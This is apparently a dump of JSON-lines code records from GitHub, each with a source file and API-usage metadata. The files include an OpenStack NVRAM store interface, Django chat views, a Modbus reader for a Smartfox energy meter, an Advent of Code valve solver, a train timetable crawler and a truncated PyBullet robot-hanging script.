"datetime.datetime.strptime", "line_number": 1184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1184, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 1328, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1328, "usage_type": "name"}, {"api_name": "odoo.fields.Date.context_today", "line_number": 1334, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 1334, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1334, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1425, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1426, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1433, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1434, 
"usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1439, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1460, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1497, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1498, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1500, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1506, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1507, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1509, "usage_type": "call"}, {"api_name": "odoo.fields.Command.set", "line_number": 1516, "usage_type": "call"}, {"api_name": "odoo.fields.Command", "line_number": 1516, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1516, "usage_type": "name"}, {"api_name": "odoo.fields.Date.to_date", "line_number": 1543, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 1543, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 1543, "usage_type": "name"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1563, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1563, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1566, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1566, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1588, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1589, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1609, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1610, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1651, "usage_type": "call"}, {"api_name": "odoo.exceptions.UserError", "line_number": 1660, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1661, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 1687, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1687, "usage_type": "name"}, {"api_name": "odoo.tools.float_is_zero", "line_number": 1803, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1807, "usage_type": "call"}, {"api_name": "odoo.tools.float_is_zero", "line_number": 1822, "usage_type": "call"}, {"api_name": "odoo.tools.translate._", "line_number": 1826, "usage_type": "call"}, {"api_name": "odoo.registry", "line_number": 1858, "usage_type": "call"}, {"api_name": "odoo.api.Environment", "line_number": 1864, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 1864, "usage_type": "name"}, {"api_name": "odoo.registry", "line_number": 1871, "usage_type": "call"}, {"api_name": "odoo.api.Environment", "line_number": 1872, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 1872, "usage_type": "name"}]}
+{"seq_id": "10594990609", "text": "import abc\nfrom nova import exception as nex\nimport six\n\nfrom nova_powervm.virt.powervm.i18n import _\n\n\nclass NVRAMUploadException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be stored for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMDownloadException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be fetched for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMDeleteException(nex.NovaException):\n msg_fmt = _(\"The NVRAM could not be deleted for instance %(instance)s. \"\n \"Reason: %(reason)s\")\n\n\nclass NVRAMConfigOptionNotSet(nex.NovaException):\n msg_fmt = _(\"The configuration option '%(option)s' must be set.\")\n\n\n@six.add_metaclass(abc.ABCMeta)\nclass NvramStore(object):\n\n @abc.abstractmethod\n def store(self, instance, data, force=True):\n \"\"\"Store the NVRAM into the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n :param data: the NVRAM data base64 encoded string\n :param force: boolean whether an update should always be saved,\n otherwise, check to see if it's changed.\n \"\"\"\n\n @abc.abstractmethod\n def fetch(self, instance):\n \"\"\"Fetch the NVRAM from the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n :returns: the NVRAM data base64 encoded string\n \"\"\"\n\n @abc.abstractmethod\n def delete(self, instance):\n \"\"\"Delete the NVRAM from the storage service.\n\n :param instance: The nova instance object OR instance UUID.\n \"\"\"\n", "repo_name": "openstack/nova-powervm", "sub_path": "nova_powervm/virt/powervm/nvram/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 1615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "nova.exception.NovaException", "line_number": 8, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 8, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 9, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 13, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 14, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 18, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 18, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 19, "usage_type": "call"}, {"api_name": "nova.exception.NovaException", "line_number": 23, "usage_type": "attribute"}, {"api_name": "nova.exception", "line_number": 23, "usage_type": "name"}, {"api_name": "nova_powervm.virt.powervm.i18n._", "line_number": 24, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 30, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 40, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 48, "usage_type": "attribute"}, {"api_name": "six.add_metaclass", "line_number": 27, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 27, "usage_type": "attribute"}]}
+{"seq_id": "36013518924", "text": "from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom .forms import *\nfrom pine.models import *\nfrom pine.forms import *\n# Create your views here.\n@login_required\ndef rooms(request):\n rooms = Room.objects.filter(slug=\"supplier\")\n\n return render(request, 'chat/rooms.html', {'rooms':rooms})\n@login_required\ndef room(request,slug):\n # rooms = Room.objects.all()\n room = Room.objects.get(slug=slug)\n messages = Message.objects.filter(room=room)[0:25]\n\n return render(request, 'chat/room.html', {'room':room, 'messages': messages, })\n\ndef room_delete(request, pk):\n try:\n room = Room.objects.get(id=pk)\n except Room.DoesNotExist:\n return redirect('bidding')\n \n if request.method == 'POST':\n room.delete()\n return redirect('bidding')\n \n return render(request, 'chat/room_delete.html', {'room': room})\n\ndef bidding(request):\n rooms = Room.objects.exclude(slug=\"employee\")\n bidding_processes = BiddingProcess.objects.all()\n if request.method == 'POST':\n roomform = RoomForm(request.POST)\n\n if roomform.is_valid():\n roomform.save()\n return redirect('bidding')\n \n else:\n roomform = RoomForm()\n\n if request.method == 'POST':\n biddingForm = BiddingForm(request.POST)\n\n if biddingForm.is_valid():\n biddingForm.save()\n return redirect('bidding')\n \n else:\n biddingForm = BiddingForm()\n\n\n return render(request, 'chat/bidding.html', {'rooms':rooms, 'roomform': roomform,\n 'bidding_processes': bidding_processes,\n 'biddingForm': biddingForm})\n\ndef bidder_win_list(request):\n bidders_win = BiddingProcess.objects.all()\n for bidding_process in bidders_win:\n bidding_process.total = bidding_process.calculate_total()\n\n context = {\n 'bidders_win': bidders_win\n }\n return render (request, 'chat/bidders_win_list.html', context)", "repo_name": "JayReonal/epine", "sub_path": "chat/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2091, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.shortcuts.render", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 29, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "16140904602", "text": "\nimport json\nimport logging\nfrom pymodbus.client import ModbusTcpClient\nfrom pymodbus.payload import BinaryPayloadDecoder\nfrom pymodbus.constants import Endian\n#from pymodbus.client.sync import ModbusTcpClient\n\n\nclass Smartfox(object):\n def __init__(self,host, port,logger):\n\n _libName = str(__name__.rsplit('.', 1)[-1])\n self._log = logging.getLogger(logger + '.' + _libName + '.' + self.__class__.__name__)\n\n self._log.debug('Create Smartfox Modbus Object')\n\n self._host = host\n self._port = port\n self._client = None\n\n self._registerFile = \"./data/SmartfoxRegister.json\"\n self._register = None\n\n self._dataType = {\n 'uint16':1,\n 'int16':1,\n 'int32':2,\n 'uint32':2,\n 'STR16':8,\n 'uint64':4,\n 'int64':4\n }\n\n def readConfigFile(self,file=False):\n if file is False:\n file = self._registerFile\n self._log.info('read local file')\n\n with open(file) as _data:\n self._register = json.load(_data)\n\n def connect(self):\n self._client = ModbusTcpClient(self._host, self._port)\n return self._client.connect()\n\n def readRegister(self,slaveId,name):\n # print(type(self._register),self._register)\n _item = self._register.get(name,False)\n if _item is False:\n # print('%s Name not found',name)\n self._log.critical('Value not found %s',name)\n return False\n _address = _item['Start'] -1\n _size = _item['Size']\n _type = _item['Type']\n _scale = _item['Scale Factor']\n if not _scale:\n _scale = 1\n _units = _item['Units']\n\n try:\n _value = self.getData(slaveId,_address,_size)\n _value = self.evaluateData(_value,_type)\n except:\n self._log.error('Problem during evaluation')\n # print(type(_value),_value)\n # print(_value*_scale,_units)\n return (_value*_scale,_units)\n\n\n def getData(self,slaveId,address,size):\n # print(slaveId,address,size)\n received = self._client.read_holding_registers(address=address,\n count= size,\n unit=slaveId)\n # print(received)\n message = BinaryPayloadDecoder.fromRegisters(received.registers, byteorder=Endian.Big, wordorder=Endian.Big)\n return message\n\n def evaluateData(self,message,dataType):\n if dataType == 'int32':\n _data = message.decode_32bit_int()\n elif dataType == 'uint32':\n _data = message.decode_32bit_uint()\n elif dataType == 'uint64':\n _data = message.decode_64bit_uint()\n elif dataType == 'STR16':\n _data = message.decode_string(16).rstrip('\\x00')\n elif dataType == 'STR32':\n _data = message.decode_string(32).rstrip('\\x00')\n elif dataType == 'int16':\n _data = message.decode_16bit_int()\n elif dataType == 'uint16':\n _data = message.decode_16bit_uint()\n else: # if no data type is defined do raw interpretation of the delivered data\n # _data = message.decode_16bit_uint()\n # print('unknown Data Type')\n self._log.error('unkown datattype')\n _data = False\n\n return _data\n\n def queryData(self,data=False):\n _store = {}\n\n if not data:\n self._log.info('read local data')\n data= [\n 'Energy from grid',\n 'Energy into grid',\n 'Energy Smartfox',\n 'Day Energy from grid',\n 'Day Energy into grid',\n 'Day Energy Smartfox',\n 'Power total',\n 'Power L1',\n 'Power L2',\n 'Power L3',\n 'Voltage L1',\n 'Voltage L2',\n 'Voltage L3',\n 'Current L1',\n 'Current L2',\n 'Current L3',\n 'Frequency',\n 'Power Smartfox'\n ]\n\n for _item in data:\n _localStore = {}\n (data,unit) =self.readRegister(1,_item)\n # print(data,unit)\n _localStore['data_value'] = data\n _localStore['data_unit'] = unit\n _store[_item] = _localStore\n\n # print(json.dumps(_store))\n return json.dumps(_store)\n\n\n\n\n 
\nif __name__ == \"__main__\":\n smart = Smartfox('192.168.2.80', 502, 'smartfox') # host, port and logger are all required; 502 is the Modbus TCP default, the logger name here is an assumed placeholder\n smart.readConfigFile()\n\n if smart.connect():\n print('Connected')\n #smart.readRegister(1, 'Energy from grid')\n smart.queryData()\n # smart.readAllRegisters()\n else:\n print('Failed to Connect')", "repo_name": "ms412/Smartfox2mqtt", "sub_path": "library/smartfox.py", "file_name": "smartfox.py", "file_ext": "py", "file_size_in_byte": 4764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pymodbus.client.ModbusTcpClient", "line_number": 44, "usage_type": "call"}, {"api_name": "pymodbus.payload.BinaryPayloadDecoder.fromRegisters", "line_number": 78, "usage_type": "call"}, {"api_name": "pymodbus.payload.BinaryPayloadDecoder", "line_number": 78, "usage_type": "name"}, {"api_name": "pymodbus.constants.Endian.Big", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pymodbus.constants.Endian", "line_number": 78, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 139, "usage_type": "call"}]}
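The getData/evaluateData pair in the Smartfox record can be exercised without a Modbus device, since BinaryPayloadDecoder accepts raw 16-bit register values directly. An offline sketch, assuming the same pymodbus generation as the record's imports (the Endian.Big spelling):

from pymodbus.payload import BinaryPayloadDecoder
from pymodbus.constants import Endian

registers = [1, 34464]  # two 16-bit words: 1 * 65536 + 34464 == 100000
decoder = BinaryPayloadDecoder.fromRegisters(
    registers, byteorder=Endian.Big, wordorder=Endian.Big
)
print(decoder.decode_32bit_uint())  # -> 100000, what evaluateData returns for 'uint32'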
+{"seq_id": "37329714492", "text": "import re\nimport sys\nimport functools\nfrom copy import copy\nfrom itertools import combinations\n\ninput = open(sys.argv[1] if len(sys.argv) >= 2 else 'input').read()\n\nFLOW_RATES = dict()\nNETWORK = dict()\n\nfor line in input.split('\\n'):\n pipe, rate, connections = re.findall(r\"Valve ([A-Z]{2}) has flow rate=([0-9]+); tunnels? leads? to valves? (.*)\", line)[0]\n rate = int(rate)\n NETWORK[pipe] = connections.split(', ')\n FLOW_RATES[pipe] = rate\n\n\ndef distance(s: str, d: str, path = set()) -> int:\n if s == d:\n return 0\n\n paths = []\n for node in [x for x in NETWORK[s] if x not in path]:\n visited = copy(path)\n visited.add(node)\n foo = distance(node, d, visited) \n if foo != None:\n paths.append(1 + foo)\n\n if len(paths) == 0:\n return None \n\n return min(paths)\n \nDISTANCE_TABLE = dict() \nUSEFULL_NODES = [node for (node, rate) in FLOW_RATES.items() if rate > 0]\nUSEFULL_NODES.append('AA')\n\nfor a, b in list(combinations(USEFULL_NODES, 2)):\n DISTANCE_TABLE[(a, b)] = distance(a, b, set(a))\n DISTANCE_TABLE[(b, a)] = distance(b, a, set(b))\n\nUSEFULL_NODES.remove('AA')\n@functools.lru_cache(maxsize=None)\ndef solve(current_node, time_remaining, enabled_nodes = None, players_remaining = 0):\n if enabled_nodes is None: enabled_nodes = frozenset() \n\n if time_remaining == 0:\n if players_remaining > 0:\n return solve('AA', 26 - 1, enabled_nodes, players_remaining - 1)\n else:\n return 0\n\n best = 0\n if current_node not in enabled_nodes and FLOW_RATES[current_node] > 0:\n new_total = time_remaining * FLOW_RATES[current_node]\n best = new_total + solve(current_node, time_remaining-1, enabled_nodes | frozenset([current_node]), players_remaining) \n\n # Look for other options\n for next_node in [node for node in USEFULL_NODES]:\n if next_node in enabled_nodes: continue\n if next_node == current_node: continue\n\n cost = DISTANCE_TABLE[current_node, next_node]\n\n if time_remaining - cost < 0: continue\n best = max(best, solve(next_node, time_remaining-cost, enabled_nodes, players_remaining))\n \n return best\n\nprint(solve('AA', 30 - 1, None, 0))\nprint(solve('AA', 26 - 1, None, 1))", "repo_name": "timfennis/advent-of-code-2022", "sub_path": "python/day16/day16-chain2.py", "file_name": "day16-chain2.py", "file_ext": "py", "file_size_in_byte": 2260, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 13, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 25, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 40, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 45, "usage_type": "call"}]}
+{"seq_id": "34986788960", "text": "from urllib import parse, request\nimport json\nfrom ptuBusCrawling.Crawler.Util.SendSlcakMsg import SendSlackMeg\nfrom ptuBusServer.Models import TrainTimeTableModel, TrainStationModel\n\n\nclass TrainTimeTableParsing:\n def __init__(self):\n self.pData = TrainStationModel.objects.all()\n self.apiKey = \"mxl46U1g52x6aVOUX/p969Zbtq9EZmboho4Jp5WiUlQ\"\n self.url = \"https://api.odsay.com/v1/api/trainServiceTime?\"\n self.msg = SendSlackMeg()\n self.trainTypeCode = [\"KTX\", \"무궁화\", \"새마을\", \"ITX-새마을\", \"누리로\", \"통근\"]\n # 0 1 2 3 4 5\n self.dailyTypeCode = [\n \"토\",\n \"금토일\",\n \"토일\",\n \"화수목금토일\",\n \"월화수목토일\",\n \"금\",\n \"금토\",\n \"금일\",\n \"월\",\n \"매일\",\n \"월화수목금토\",\n \"월화수목금\",\n \"월화수목\",\n ]\n # 0 1 2 3 4 5 6 7 8 9 10\n\n def makeURL(self, query):\n return self.url + parse.urlencode(query, encoding=\"UTF-8\", doseq=True)\n\n def openURL(self, query):\n url = self.makeURL(query)\n request_url = request.Request(url)\n response = request.urlopen(request_url)\n return response.read().decode(\"utf-8\")\n\n def checkError(self, data):\n if (\"error\" in data) == True:\n code = data[\"error\"][0][\"code\"]\n message = data[\"error\"][0][\"message\"]\n error_status = \"code : \" + code + \"\\nmessage : \" + message\n print(error_status)\n self.msg.sendMsg(error_status)\n sys.exit()\n else:\n return data\n\n def parsing(self):\n count = 1\n for parsingData in self.pData:\n query = [\n (\"apiKey\", self.apiKey),\n (\"startStationID\", parsingData.startStationID),\n (\"endStationID\", parsingData.endStationID),\n ]\n data = self.openURL(query)\n rDD = self.checkError(json.loads(data))\n startStationName = rDD[\"result\"][\"startStationName\"]\n startStationID = rDD[\"result\"][\"startStationID\"]\n endStationName = rDD[\"result\"][\"endStationName\"]\n endStationID = rDD[\"result\"][\"endStationID\"]\n results = rDD[\"result\"][\"station\"]\n for result in results:\n TrainTimeTableModel(\n id=count,\n startStationName=startStationName,\n startStationID=startStationID,\n endStationName=endStationName,\n endStationID=endStationID,\n railName=result[\"railName\"],\n trainClass=self.trainTypeCode.index(result[\"trainClass\"]),\n departureTime=result[\"departureTime\"],\n schedule=result[\"arrivalTime\"],\n wasteTime=result[\"wasteTime\"],\n dailyTypeCode=self.dailyTypeCode.index(result[\"runDay\"]),\n ).save()\n count += 1\n\n\nif __name__ == \"__main__\":\n if __package__ is None:\n import sys\n from os import path\n\n sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n from TrainStationParsing import TrainStationParsing\n else:\n from .TrainStationParsing import TrainStationParsing\n sample = TrainTimeTableParsing(TrainStationParsing().parsing()).parsing()\n", "repo_name": "ptuBus/ptuBus_Server", "sub_path": "ptuBusCrawling/Crawler/Trains/TrainTimeTableParsing.py", "file_name": "TrainTimeTableParsing.py", "file_ext": "py", "file_size_in_byte": 3551, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ptuBusServer.Models.TrainStationModel.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.TrainStationModel.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "ptuBusServer.Models.TrainStationModel", "line_number": 9, "usage_type": "name"}, {"api_name": "ptuBusCrawling.Crawler.Util.SendSlcakMsg.SendSlackMeg", "line_number": 12, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 
33, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.request.Request", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 37, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 38, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "ptuBusServer.Models.TrainTimeTableModel", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 89, "usage_type": "call"}, {"api_name": "TrainStationParsing.TrainStationParsing", "line_number": 93, "usage_type": "call"}]}
+{"seq_id": "72606297367", "text": "import os, inspect\nimport argparse\nimport json\nimport time\nimport quaternion\nimport scipy.io as sio\nimport numpy as np\nfrom scipy.spatial.transform import Rotation as R\nfrom PIL import Image\nimport pybullet as p\nimport pybullet_data\n\n# for robot control\nfrom pybullet_robot_envs.envs.panda_envs.panda_env import pandaEnv\n\nfrom utils.bullet_utils import get_matrix_from_pose, get_pose_from_matrix, get_matrix_from_pos_rot, get_pos_rot_from_matrix, xyzw2wxyz, wxyz2xyzw, draw_coordinate, draw_bbox\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(os.path.dirname(currentdir))\nos.sys.path.insert(0, parentdir)\n\ndef recover_trajectory(traj_src : np.ndarray, hook_poses : np.ndarray, \n centers : np.ndarray, scales, dataset_mode : int=0):\n # traj : dim = batch x num_steps x 6\n # dataset_mode : 0 for abosute, 1 for residual \n\n traj = None\n traj = np.copy(traj_src)\n\n waypoints = []\n\n if dataset_mode == 0: # \"absolute\"\n\n traj[:, :3] = traj[:, :3] * scales + centers\n \n hook_trans = get_matrix_from_pose(hook_poses)\n for wpt_id in range(0, traj.shape[0]): # waypoints\n\n wpt = np.zeros(6)\n # contact pose rotation\n wpt[:3] = traj[wpt_id]\n\n # transform to world coordinate first\n current_trans = np.identity(4)\n current_trans[:3, 3] = traj[wpt_id]\n current_trans = hook_trans @ current_trans\n\n if wpt_id < traj.shape[0] - 1:\n # transform to world coordinate first\n\n peep_num_max = int(np.ceil(traj.shape[0] / 10.0))\n peep_num = peep_num_max if wpt_id < traj.shape[0] - peep_num_max else traj.shape[0] - wpt_id - 1\n to_pos = np.ones((4, peep_num))\n to_pos[:3] = traj[wpt_id:wpt_id+peep_num].T \n to_pos = (hook_trans @ to_pos)[:3]\n \n from_pos = np.ones((4, peep_num))\n from_pos[:3] = traj[wpt_id+1:wpt_id+peep_num+1].T \n from_pos = (hook_trans @ from_pos)[:3]\n\n weight = np.array([1/x for x in range(3, peep_num+3)])[:peep_num]\n weight /= np.sum(weight)\n diff = (to_pos - from_pos) * weight\n \n x_direction = np.sum(diff, axis=1)\n x_direction /= np.linalg.norm(x_direction, ord=2)\n y_direction = np.cross(x_direction, [0, 0, -1])\n y_direction /= np.linalg.norm(y_direction, ord=2)\n z_direction = np.cross(x_direction, y_direction)\n rotation_mat = np.vstack((x_direction, y_direction, z_direction)).T\n current_trans[:3, :3] = rotation_mat\n \n else :\n\n current_trans[:3, :3] = R.from_rotvec(waypoints[-1][3:]).as_matrix() # use the last waypoint's rotation as current rotation\n \n waypoints.append(get_pose_from_matrix(current_trans, pose_size=6))\n \n return waypoints\n\n\ndef robot_apply_action(robot : pandaEnv, obj_id : int, action : tuple or list, gripper_action : str = 'nop', \n sim_timestep : float = 1.0 / 240.0, diff_thresh : float = 0.005, max_vel : float = 0.2, max_iter = 5000):\n\n assert gripper_action in ['nop', 'pre_grasp', 'grasp']\n\n if gripper_action == 'nop':\n assert len(action) == 7, 'action length should be 7'\n\n robot.apply_action(action, max_vel=max_vel)\n diff = 10.0\n iter = 0\n while diff > diff_thresh and iter < max_iter: \n iter += 1\n\n p.stepSimulation()\n time.sleep(sim_timestep)\n\n tmp_pos = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[4] # position\n tmp_rot = p.getLinkState(robot.robot_id, robot.end_eff_idx, physicsClientId=robot._physics_client_id)[5] # rotation\n diff = np.sum((np.array(tmp_pos + tmp_rot) - np.array(action)) ** 2) ** 0.5\n\n elif gripper_action == 'pre_grasp' :\n\n 
robot.pre_grasp()\n for _ in range(int(1.0 / sim_timestep) * 1): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n else:\n\n robot.grasp(obj_id)\n for _ in range(int(1.0 / sim_timestep)): # 1 sec\n p.stepSimulation()\n time.sleep(sim_timestep)\n\ndef get_dense_waypoints(start_config : list or tuple or np.ndarray, end_config : list or tuple or np.ndarray, resolution : float=0.005):\n\n assert len(start_config) == 7 and len(end_config) == 7\n\n d12 = np.asarray(end_config[:3]) - np.asarray(start_config[:3])\n steps = int(np.ceil(np.linalg.norm(np.divide(d12, resolution), ord=2)))\n obj_init_quat = quaternion.as_quat_array(xyzw2wxyz(start_config[3:]))\n obj_tgt_quat = quaternion.as_quat_array(xyzw2wxyz(end_config[3:]))\n\n ret = []\n # plan trajectory in the same way in collision detection module\n for step in range(steps):\n ratio = (step + 1) / steps\n pos = ratio * d12 + np.asarray(start_config[:3])\n quat = quaternion.slerp_evaluate(obj_init_quat, obj_tgt_quat, ratio)\n quat = wxyz2xyzw(quaternion.as_float_array(quat))\n position7d = tuple(pos) + tuple(quat)\n ret.append(position7d)\n\n return ret\n\ndef refine_rotation(src_transform, tgt_transform):\n src_rot = src_transform[:3, :3]\n tgt_rot = tgt_transform[:3, :3]\n\n s2d_before = R.from_matrix(tgt_rot @ np.linalg.inv(src_rot)).as_rotvec()\n\n rot_180 = np.identity(4)\n rot_180[:3, :3] = R.from_rotvec([0, 0, np.pi]).as_matrix()\n tgt_dual_transform = tgt_transform @ rot_180\n s2d_after = R.from_matrix(tgt_dual_transform[:3, :3] @ np.linalg.inv(src_rot)).as_rotvec()\n\n return tgt_transform if np.sum((s2d_before) ** 2) < np.sum((s2d_after) ** 2) else tgt_dual_transform\n\ndef main(args):\n\n time_stamp = time.localtime()\n time_mon_day = '{:02d}{:02d}'.format(time_stamp.tm_mon, time_stamp.tm_mday)\n\n data_dir = f'{args.data_root}/{args.data_dir}'\n kpt_trajectory_dir = f'{args.input_root}/{args.input_dir}' if args.input_dir != '' else f'{args.input_root}/{time_mon_day}'\n\n assert os.path.exists(data_dir), f'{data_dir} not exists'\n assert os.path.exists(kpt_trajectory_dir), f'{kpt_trajectory_dir} not exists'\n assert os.path.exists(args.output_root), f'{args.output_root} not exists'\n \n # load model\n obj_fname = f'{kpt_trajectory_dir}/{args.obj}'\n hook_fname = f'{kpt_trajectory_dir}/{args.hook}'\n obj_name = os.path.split(obj_fname)[1].split('.')[0]\n hook_name = os.path.split(hook_fname)[1].split('.')[0]\n obj_hook_pair_fname = f'{data_dir}/Hook_my_bar_easy-everyday_objects_50/Hook_my_bar_easy-{obj_name}.json'\n\n assert os.path.exists(obj_hook_pair_fname), f'{obj_hook_pair_fname} not exists'\n assert os.path.exists(obj_fname), f'{obj_fname} not exists'\n assert os.path.exists(hook_fname), f'{hook_fname} not exists'\n\n with open(obj_hook_pair_fname, 'r') as f:\n obj_hook_pair_dict = json.load(f)\n with open(obj_fname, 'r') as f:\n obj_dict = json.load(f)\n with open(hook_fname, 'r') as f:\n hook_dict = json.load(f)\n \n # demonstration_dir = f'{args.output_root}/{args.output_dir}' if args.output_dir != '' else f'{args.output_root}/{time_mon_day}'\n # if not os.path.exists(demonstration_dir):\n # os.mkdir(demonstration_dir)\n\n # assert some attributes exist in the given json files\n assert 'initial_pose' in obj_hook_pair_dict.keys(), \\\n f'\"initial_pose\" not in obj_hook_pair_dict!, please run hanging_init_pose.py'\n assert 'contact_pose' in obj_dict.keys() and 'file' in obj_dict.keys(), \\\n f'\"contact_pose\" or \"file\" not in obj_dict!, please run keypoint_pose.py'\n assert 'hook_pose' in hook_dict.keys() and 'file' 
